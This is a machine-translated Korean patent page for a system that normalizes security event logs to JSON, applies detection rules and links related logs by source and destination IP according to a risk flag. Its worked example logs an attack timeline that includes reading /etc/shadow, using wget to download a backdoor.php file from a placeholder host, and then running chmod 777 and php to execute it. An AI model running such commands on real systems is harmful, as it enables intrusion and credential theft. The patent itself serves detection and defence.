KR20170058140A - An analysis system of security breach with analyzing a security event log and an analysis method thereof - Google Patents
An analysis system of security breach with analyzing a security event log and an analysis method thereof Download PDFInfo
- Publication number
- KR20170058140A KR20170058140A KR1020150161973A KR20150161973A KR20170058140A KR 20170058140 A KR20170058140 A KR 20170058140A KR 1020150161973 A KR1020150161973 A KR 1020150161973A KR 20150161973 A KR20150161973 A KR 20150161973A KR 20170058140 A KR20170058140 A KR 20170058140A
- Authority
- KR
- South Korea
- Prior art keywords
- event
- log
- security
- event log
- analysis
- Prior art date
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/30—Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information
- H04L63/308—Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information retaining data, e.g. retaining successful, unsuccessful communication attempts, internet access, or e-mail, internet telephony, intercept related information or call content
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Technology Law (AREA)
- Debugging And Monitoring (AREA)
Abstract
Description
The present invention relates to a system and method for analyzing security violation through security event log analysis. More particularly, the present invention relates to a system and method for analyzing a security violation by analyzing an event log generated in a security violation process occurring in a local terminal, To a security attack analysis system and an analysis method using the security event log analysis.
Along with the increase of information system assets, various operating environments (OS), application programs for mobile terminals (APPLICATION), and security solutions have been developed and used. Security events recorded in such various environments are also stored in various forms, and their capacity is also rapidly increasing.
Events related to security breaches occurring in various types of local terminals are recorded in the event log by a local terminal or a monitoring device on the network. The administrator analyzes the generated event log to check the damage of the security breach, and takes measures to prevent further infringement.
FIG. 1 is a block diagram illustrating a network risk composite analysis system according to the prior art.
The plurality of
The log
The individual
However, in the related art, the generated network-based security event log is analyzed to measure the risk. In some cases, it is effective to group and analyze various security events related to each other. In addition, in the conventional technology for analyzing the network-based security event log, there is a problem that it is difficult to efficiently cope with such a need because the related analysis method can not be provided.
According to an aspect of the present invention, there is provided a method for processing a security event log of various types generated in a local terminal and a network based on a single format, processing a normalized event log into a JSON file, SQL), and analyzing a stored event log to analyze a security violation element, and to provide a security violation analysis system and analysis method using the security event log analysis.
Also, according to the present invention, a security event log analysis is performed so as to accurately grasp the flow of security violation, location, threat, vulnerability, etc. by performing linkage analysis of various event logs based on a source or destination according to a risk flag And to provide a security infringement analysis system and an analysis method thereof.
The present invention has been made to solve the above-mentioned problems, and it is an object of the present invention to provide a security intrusion analysis system for analyzing a security event occurring in a local terminal and providing the security event to an administrator, An integrated
The normalized event log is composed of data having fields of "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE". TIME is a time of detection of a security event in unix time format, TYPE is the type of security event, HOST is the IP address or host name of the sensor from which the security event was detected, SRC is the origin IP in the security event, DST is the destination IP in the security event, CONTENTS_001 through CONTENTS_004 are security And LINKED_LOGTYPE is defined as the target of the event log to perform linkage analysis. The LINKED_LOGTYPE is an event log in which a security event of a predetermined threshold value or more occurs for a certain period of time before and after a single event occurrence time.
If the risk flag included in the event log to be detected is 1, the
The single
According to another embodiment of the present invention, there is provided a security infringement analysis method using a security intrusion analysis system. When the local
The normalized event log is composed of data having fields of "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE". TIME is a time of detection of a security event in unix time format, TYPE is the type of security event, HOST is the IP of the sensor where the security event is detected, SRC is the IP of the origin of the security event, DST is the destination IP in the security event, CONTENTS_001 to CONTENTS_004 are the security event And LINKED_LOGTYPE is defined as a target of event log to perform linkage analysis. It is characterized in that an event in which a security event of a predetermined threshold value or more occurs for a predetermined time before and after a single event occurrence time is logged.
If the risk flag included in the event log to be detected is 1, the
The single
According to the present invention, it is possible to record a security infringement applied to various types of local terminals as a normalized event log and perform an integrated analysis. By classifying and analyzing event logs associated with specific information, security breaches, threats, There is an effect that can be grasped.
In addition, it is possible to easily identify the security breach attempt process by sorting the event occurrence order by time zone, thereby minimizing human, time, and material resources required for event analysis.
1 is a block diagram illustrating a system for analyzing the overall network risk according to the prior art.
FIG. 2 is a block diagram illustrating a structure and a connection state of a security intrusion analysis system according to an embodiment of the present invention; FIG.
3 is a flowchart illustrating a process of a security invasion analysis method using the analysis system of the present invention.
4 is a table showing an example of a detection rule included in the event detection rule DB;
Figures 5A and 5B are tables showing the results of linkage analysis for event logs.
Hereinafter, a security infringement analysis system and analysis method using security event log analysis according to an embodiment of the present invention will be described with reference to the drawings.
FIG. 2 is a block diagram illustrating a structure and a connection state of a security intrusion analysis system according to an embodiment of the present invention.
(Hereinafter referred to as "analysis system") of the present invention collects, analyzes, analyzes and analyzes security violation events occurring in a
The local
The
The integrated
The
In the present invention, normalizing the event log in JSON form is convenient for recording in the NoSQL-based integrated
The attributes of the event log that are normalized and stored by the
The single
The
In the present invention, when the single event detection result is true, the risk flag (FLAG) of the event detection rule is checked to determine whether or not to analyze the linkage. The risk flag is determined by referring to the information protection guidelines set by the administrator and the experience of the activity, Common Vulnerabilities & Exposures (CVE), and the like. In accordance with the risk flags, the
The
The event
4 is a table showing an example of a detection rule included in the event detection rule DB. The meaning of each data field included in the detection rule is shown in Table 1 below.
"logtype" is a type of security event to be detected in the present invention, and includes a network packet event log (syslogs), a firewall policy event log (iptableslogs), an intrusion detection / blocking system event log (detectionlogs) infectedlogs), router / switch network event logs (networklogs), Linux SSH (secure shell) event logs (securelogs), web firewall event logs (waflogs), Linux system command execution event logs (cmdlogs) malwarelogs), virtual private network (VPN) event logs (vpnlogs), Windows remote terminal event logs, file system monitor event logs (filemonlogs), Windows registry (regmonlogs) Event logs (httpdlogs), information system domain query event logs (dnslogs), web access event logs (accesslogs), database events (Dblogs), system security patch event logs (patchlogs), system account event logs (userlogs), system network event logs (netstatelogs), and rootkit event logs (rootkitlogs).
Each security event is recorded in a form dependent on the local terminal configuration environment such as a log file, a DB, a network Pcap (packet capture) file format, and the like.
The "history" records definitions and characteristics of detection rules, and is used as a column for managing the history of registration, modification, deletion, etc. of detection rules by the
"registertime" records the generation time of the detection rule, and defines the date and time when the detection rule is registered / created.
"supervisionid" is a unique value of the security manager or system that registered the detection rule, and it means the ID of the security manager.
"cnt " records the index number of the detection rule, and generates an index number that sequentially increases each time the security manager or the system registers / creates the detection rule.
"flag" records the risk flag. The risk flag is determined by substituting the risk for the detection rule (CVE, information protection guideline, risk assessment based on information protection organization experience) into the risk flag measurement calculation formula.
When the risk flag is 0, the single
In the
We will explain in detail how to analyze security breach using the above configuration.
FIG. 3 is a flowchart illustrating a process of a security invasion analysis method using the analysis system of the present invention.
First, the
The security event list collected by the
The
The normalization of the event log is intended to allow the administrator to quickly grasp the contents of the security event by displaying data fields having common attributes in the event log recorded in different forms.
In the present invention, the data included in the event log is sorted into "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, and LINKED_LOGTYPE" in the event log normalization. do.
The information represented by each field is shown in Table 2 below.
The TIME field records the time of the detection of the security event in unixtimestamp format.
The HOST field records the IP address or host name of the IPv4-based detection sensor. The hostname chooses DNS resolvability.
IP recorded in the SRC and DST fields also records IPv4-based addresses.
In the CONTENTS field, details recorded at the time of event log creation are described, and specific contents of the event log-related keywords may be included.
The LINKED_LOGTYPE field defines the target of the various event logs for which the event log will perform linkage analysis. The target of the linkage analysis is the event log in which the security event occurs over a predetermined threshold value for a certain time before or after the occurrence time of a specific single event.
For example, if a single single security event occurs at 1 PM on November 2, 2015 and you want to have a single analysis on it, you can associate another event log with more than 10 security events in the hour around 1 PM It can be analyzed. That is, select the event log of the type in which the security event occurred more than 10 times during the two hours from 12:00 pm to 2:00 pm.
The criterion such as the time of the reference time, the length of the time before and after the event, the threshold value of the abnormal event, and the like can be appropriately selected by the security administrator or the system.
The single
The single
In the case of content-based detection, the patterns referenced in the event
In the case of host-based detection, a keyword referred to in the event
The single
Next, the
The risk flag is determined when an information protection manager performing an information protection activity registers / creates a single event detection rule in the event
In case of CVE, refer to High / Medium / Low classified by CVSS (Common Vulnerability Scoring system). For example, when the class classified by CVSS is High, 7 points to 10 points are given. In the case of Medium, 4 points to 6.9 points are given. In the case of Low, 0 points to 3.9 points are given. In some cases, it may be divided into two cases, that is, the case of "medium" or more and the case of "less than".
In the case of the information protection guideline, the first grade is awarded as 'up', the second grade as 'middle', and the third grade as 'lower'. In some cases, the risk flag may be raised in the case of
The administrator of the information protection may determine the flag value by referring to the experience in the security issue / analysis of the information security organization.
The risk flag can be determined by referring to the CVE, the information protection guidelines, and the manager's experience. In addition, the risk flag can be selected according to various criteria. In the
The
When the risk flag for the event log to be detected is 0, no linkage analysis is performed.
When the risk flag is 1, it extracts the value of SRC (originating IP from security event) in the corresponding security event log and analyzes the OR operation of SRC and DST defined in the column "LINKED_LOGTYPE" included in the normalization data Conduct.
When the risk flag is 2, the value of DST (the IP of the destination in the security event) is extracted from the corresponding security event log, and the OR operation of SRC and DST defined in the column "LINKED_LOGTYPE" included in the normalization data is analyzed Conduct.
When the risk flag value is 3, SRC and DST values are extracted together in the corresponding security event log, and an AND operation link analysis is performed on SRC and DST for the security events defined in the column "LINKED_LOGTYPE" included in the normalization data.
The
5A and 5B are tables showing a result of linkage analysis for event logs.
Referring to FIGS. 5A and 5B, events (events) are transmitted from the SRC (originating IP address) 125.141.XX.XX (tentative name) to the DST (destination IP address) 218.15.XX.XX (tentative) of the intrusion detection / The log was detected. Since the risk flag stored in the event
Table 3 below describes the results of analysis of the security events in FIGS. 5A and 5B in time sequence.
11:10:24 AM
Determine risk flag: Determine risk flag value as 2
Perform linkage analysis on the event log declared in the normalized column LINKED_LOGTYPE.
11:10:26 AM
11:11:26 AM
11:11:27 AM
11:11:29 AM
11:11:29 AM
11:11:31 AM
11:11:33 AM
11:20:32 AM
11:20:40 AM
Detecting file history by running vim / etc / shadows command
11:20:55 AM
Detecting file browsing history by running vim / etc / hosts
11:21:05 AM
Detect wget http: xxx.xx.xx / backdoor.php download
11:21:06 AM
http: xxx.xx.xx / backdoor.php file download packet
11:21:56 AM
mv backdoor.php /tmp/system.php
11:22:01 AM
chmod 777 /tmp/system.php; php /tmp/system.php
11:22:05 AM
Detecting domain queries that are suspected to be malicious sites
11:22:06 AM
Detecting domain queries that are suspected to be malicious sites
11:22:07 AM
Detecting domain queries that are suspected to be malicious sites
11:22:47 AM
Vaccine malware detection
11:24:01 AM
SSL vulnerability detection
11:24:12 AM
BASH SHELL vulnerability detection
To summarize the security events in step 21 recorded in Table 3, an attempt was made to detect an SQL injection attack in the intrusion detection / prevention system event logs (detection logs). As a result of linkage analysis according to the risk flag (2) It is possible to use the web firewall event log (waflog), Linux SSH event log (securelogs), Linux system command execution event log (cmdlogs), executable file download event log (httpdlogs), system domain query event log (dnslogs) Code infected event logs (infectedlogs), and system patch event logs (pathclogs).
Therefore, it is possible to quickly check the flow and location of security violation occurred in a specific IP and security threat (vulnerability) of a specific system through linkage analysis.
If the risk flag of a specific security event log is 1, linkage analysis based on SRC can be performed and provided to the administrator. When the risk flag is 3, the linkage analysis is performed using both SRC and DST as a reference.
However, the selection criterion of the linkage analysis field according to the risk flag may vary depending on the characteristics of the system. That is, if the risk flag is 2, linkage analysis may be performed based on the SRC, and when the risk flag is 1, linkage analysis may be performed based on DST. In addition, a linkage analysis conditional expression may be set according to a new risk flag.
The result of the linkage analysis is stored in the
Therefore, a single security event can easily detect security intrusion by link analysis result of limited intrusion detection, infringement causation, threat, vulnerability, etc., and by arranging the event occurrence sequence in the timeline, You can check.
It can also reduce the human, material, and temporal resources required to analyze security breaches.
While the present invention has been described with reference to exemplary embodiments, it is to be understood that the invention is not limited to the disclosed embodiments, but, on the contrary, As will be understood by those skilled in the art. Therefore, it should be understood that the above-described embodiments are to be considered in all respects as illustrative and not restrictive, the scope of the invention being indicated by the appended claims rather than the foregoing description, It is intended that all changes and modifications derived from the equivalent concept be included within the scope of the present invention.
100: analysis system 102: integrated log collection unit
104: log normalization unit 106: single event detection unit
108: linkage analysis unit 110: risk measurement unit
112: event detection rule DB 114: integrated log DB
200: local terminal 202: local log collection unit
300: administrator terminal
Claims (8)
An integrated log collecting unit 102 for receiving the event log collected by the local log collecting unit 202 installed in the local terminal 200 and storing the received event log in the integrated log DB 114;
A log normalization unit 104 for normalizing the event log received by the integrated log collecting unit 102, converting the received event log into a JSON (JavaScript Object Notation) file format, and storing the normalized event log in the integrated log DB 114, Wow;
A single event detection unit 106 for analyzing the normalized event log by referring to a detection rule stored in the event detection rule DB 112 and analyzing whether the event log includes an event recording that may cause security breach;
A linkage analysis unit (108) for linking and analyzing a plurality of event logs when a risk flag assigned to an event log to be analyzed by the single event detection unit (106) is a predetermined value;
And a risk measurement unit (110) for determining a connection log type of the event log to be detected by referring to a risk flag column of a detection rule stored in the event detection rule DB (112) Security Infringement Analysis System.
The normalized event log is composed of data of fields of "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"
TIME is the type of security event, HOST is the IP address or host name of the sensor where the security event was detected, SRC is the IP of the source in the security event, DST CONTENTS_001 to CONTENTS_004 are detailed contents of security event. LINKED_LOGTYPE is a definition of the target of event log to perform link analysis. It is defined as an event log for a predetermined time or more before and after a single event occurrence time. The event is logged in the event that the event occurred, characterized by security event log analysis through security breach analysis system.
The linkage analysis unit 108
If the risk flag included in the event log to be detected is 1, the SRC is extracted from the event log and the link analysis is performed by OR operation of SRC and DST on the event log defined in "LINKED_LOGTYPE &
If the risk flag included in the event log to be detected is 2, the DST is extracted from the event log, and the link analysis is performed by OR operation of SRC and DST on the event log defined in "LINKED_LOGTYPE &
When the risk flag included in the event log to be detected is 3, SRC and DST are extracted from the event log and link analysis is performed by the AND operation of SRC and DST on the event log defined in "LINKED_LOGTYPE" And analyzing the security event log.
The single event detection unit 106 detects a single event among the data included in the normalized event log
Content-based detection for pattern-matching the keywords referenced in the event detection rule DB 112 with respect to the CONTENTS_001 through CONTENTS_004 through a combination of AND, OR, and NOT operators;
Based detection in which a keyword referred to in the event detection rule DB 112 is pattern-matched with a combination of AND, OR, and NOT operators for the HOST, the SRC, and the DST. Security Infringement Analysis System through Event Log Analysis.
When the local log collection unit 202 installed in the local terminal 200 collects and transmits an event log, the integrated log collection unit 102 receives the event log and stores the received event log in the integrated log DB 114;
The log normalization unit 104 normalizes the event log received by the integrated log collecting unit 102 and converts the event log into a JSON (JavaScript Object Notation) file, and stores the normalized event log in the integrated log DB 114 A second step of:
The single event detection unit 106 analyzes the normalized event log by referring to the detection rule stored in the event detection rule DB 112 and analyzes the normalized event log to determine whether the event log includes an event Step 3;
A fourth step of the risk measurement unit 110 determining a joint log type of the event log to be detected by referring to the risk flag column of the detection rule stored in the event detection rule DB 112;
And a fifth step of linking and analyzing a plurality of event logs when the risk analysis flag for the event log to be analyzed by the single event detection unit 106 is a predetermined value, How to analyze security breach through event log analysis.
The normalized event log is composed of data of fields of "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"
TIME is the type of security event, HOST is the IP address or host name of the sensor where the security event was detected, SRC is the IP of the source in the security event, DST CONTENTS_001 to CONTENTS_004 are detailed contents of security event. LINKED_LOGTYPE is a definition of the target of event log to perform link analysis. It is defined as an event log for a predetermined time or more before and after a single event occurrence time. Wherein the event is logged in the event that the event occurred.
The linkage analysis unit 108
If the risk flag included in the event log to be detected is 1, the SRC is extracted from the event log and the link analysis is performed by OR operation of SRC and DST on the event log defined in "LINKED_LOGTYPE &
If the risk flag included in the event log to be detected is 2, the DST is extracted from the event log, and the link analysis is performed by OR operation of SRC and DST on the event log defined in "LINKED_LOGTYPE &
When the risk flag included in the event log to be detected is 3, SRC and DST are extracted from the event log and link analysis is performed by the AND operation of SRC and DST on the event log defined in "LINKED_LOGTYPE" And analyzing the security event log.
The single event detection unit 106 detects a single event among the data included in the normalized event log
Content-based detection for pattern-matching the keywords referenced in the event detection rule DB 112 with respect to the CONTENTS_001 through CONTENTS_004 through a combination of AND, OR, and NOT operators;
Based detection in which a keyword referred to in the event detection rule DB 112 is pattern-matched with a combination of AND, OR, and NOT operators for the HOST, the SRC, and the DST. How to analyze security breach through event log analysis.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
KR1020150161973A KR101788410B1 (en) | 2015-11-18 | 2015-11-18 | An analysis system of security breach with analyzing a security event log and an analysis method thereof |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
KR1020150161973A KR101788410B1 (en) | 2015-11-18 | 2015-11-18 | An analysis system of security breach with analyzing a security event log and an analysis method thereof |
Publications (2)
Publication Number | Publication Date |
---|---|
KR20170058140A true KR20170058140A (en) | 2017-05-26 |
KR101788410B1 KR101788410B1 (en) | 2017-10-19 |
Family
ID=59052141
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
KR1020150161973A KR101788410B1 (en) | 2015-11-18 | 2015-11-18 | An analysis system of security breach with analyzing a security event log and an analysis method thereof |
Country Status (1)
Country | Link |
---|---|
KR (1) | KR101788410B1 (en) |
Cited By (7)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
KR102038926B1 (en) * | 2018-11-17 | 2019-11-15 | 한국과학기술정보연구원 | Aggressor selecting device and control method thereof |
KR102158784B1 (en) * | 2020-05-14 | 2020-09-22 | 주식회사 쿼리시스템즈 | System for automatically blocking security threats that interoperate with heterogeneous security devices |
KR102215228B1 (en) | 2020-04-13 | 2021-02-10 | 서울과학기술대학교 산학협력단 | Detection and Elimination System and Method of Redundant Access Patterns in Programs by Analyzing Log Data |
CN113592690A (en) * | 2021-07-30 | 2021-11-02 | 卡斯柯信号有限公司 | Database model-based hazard management method |
KR102426889B1 (en) * | 2022-01-05 | 2022-07-29 | 주식회사 이글루코퍼레이션 | Apparatus, method and program for analyzing and processing data by log type for large-capacity event log |
CN114826727A (en) * | 2022-04-22 | 2022-07-29 | 南方电网数字电网研究院有限公司 | Flow data acquisition method and device, computer equipment and storage medium |
CN116232751A (en) * | 2023-03-16 | 2023-06-06 | 中国华能集团有限公司北京招标分公司 | Safety alarm analysis method |
-
2015
- 2015-11-18 KR KR1020150161973A patent/KR101788410B1/en active IP Right Grant
Cited By (10)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
KR102038926B1 (en) * | 2018-11-17 | 2019-11-15 | 한국과학기술정보연구원 | Aggressor selecting device and control method thereof |
KR102215228B1 (en) | 2020-04-13 | 2021-02-10 | 서울과학기술대학교 산학협력단 | Detection and Elimination System and Method of Redundant Access Patterns in Programs by Analyzing Log Data |
KR102158784B1 (en) * | 2020-05-14 | 2020-09-22 | 주식회사 쿼리시스템즈 | System for automatically blocking security threats that interoperate with heterogeneous security devices |
CN113592690A (en) * | 2021-07-30 | 2021-11-02 | 卡斯柯信号有限公司 | Database model-based hazard management method |
CN113592690B (en) * | 2021-07-30 | 2024-03-29 | 卡斯柯信号有限公司 | Hazard management method based on database model |
KR102426889B1 (en) * | 2022-01-05 | 2022-07-29 | 주식회사 이글루코퍼레이션 | Apparatus, method and program for analyzing and processing data by log type for large-capacity event log |
KR20230106083A (en) * | 2022-01-05 | 2023-07-12 | 주식회사 이글루코퍼레이션 | Device, method and program that analyzes large log data using a distributed method for each log type |
CN114826727A (en) * | 2022-04-22 | 2022-07-29 | 南方电网数字电网研究院有限公司 | Flow data acquisition method and device, computer equipment and storage medium |
CN114826727B (en) * | 2022-04-22 | 2024-05-07 | 南方电网数字电网研究院有限公司 | Flow data acquisition method, device, computer equipment and storage medium |
CN116232751A (en) * | 2023-03-16 | 2023-06-06 | 中国华能集团有限公司北京招标分公司 | Safety alarm analysis method |
Also Published As
Publication number | Publication date |
---|---|
KR101788410B1 (en) | 2017-10-19 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
KR101788410B1 (en) | An analysis system of security breach with analyzing a security event log and an analysis method thereof | |
JP6863969B2 (en) | Detecting security incidents with unreliable security events | |
EP2953298B1 (en) | Log analysis device, information processing method and program | |
KR101689298B1 (en) | Automated verification method of security event and automated verification apparatus of security event | |
CN111800395A (en) | Threat information defense method and system | |
CN107295021B (en) | Security detection method and system of host based on centralized management | |
US20030083847A1 (en) | User interface for presenting data for an intrusion protection system | |
CN107733699B (en) | Internet asset security management method, system, device and readable storage medium | |
CN110868403B (en) | Method and equipment for identifying advanced persistent Attack (APT) | |
CN114640548A (en) | Network security sensing and early warning method and system based on big data | |
EP3623983A1 (en) | Method and device for identifying security threats, storage medium, processor and terminal | |
WO2016121348A1 (en) | Anti-malware device, anti-malware system, anti-malware method, and recording medium in which anti-malware program is stored | |
CN107465702A (en) | Method for early warning and device based on wireless network invasion | |
CN107566401A (en) | The means of defence and device of virtualized environment | |
KR101768079B1 (en) | System and method for improvement invasion detection | |
CN113660115A (en) | Network security data processing method, device and system based on alarm | |
KR20070072835A (en) | Web hacking responses through real time web log collection | |
CN107509200A (en) | Equipment localization method and device based on wireless network invasion | |
CN113055362B (en) | Method, device, equipment and storage medium for preventing abnormal behaviors | |
CN114189361A (en) | Situation awareness method, device and system for defending threats | |
KR101767591B1 (en) | System and method for improvement invasion detection | |
Lee et al. | Sierra: Ranking anomalous activities in enterprise networks | |
KR101712462B1 (en) | System for monitoring dangerous ip | |
KR101518233B1 (en) | Security Apparatus for Threats Detection in the Enterprise Internal Computation Environment | |
Irwin | Double-edged sword: dual-purpose cyber security methods |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
A201 | Request for examination | ||
E902 | Notification of reason for refusal | ||
E701 | Decision to grant or registration of patent right |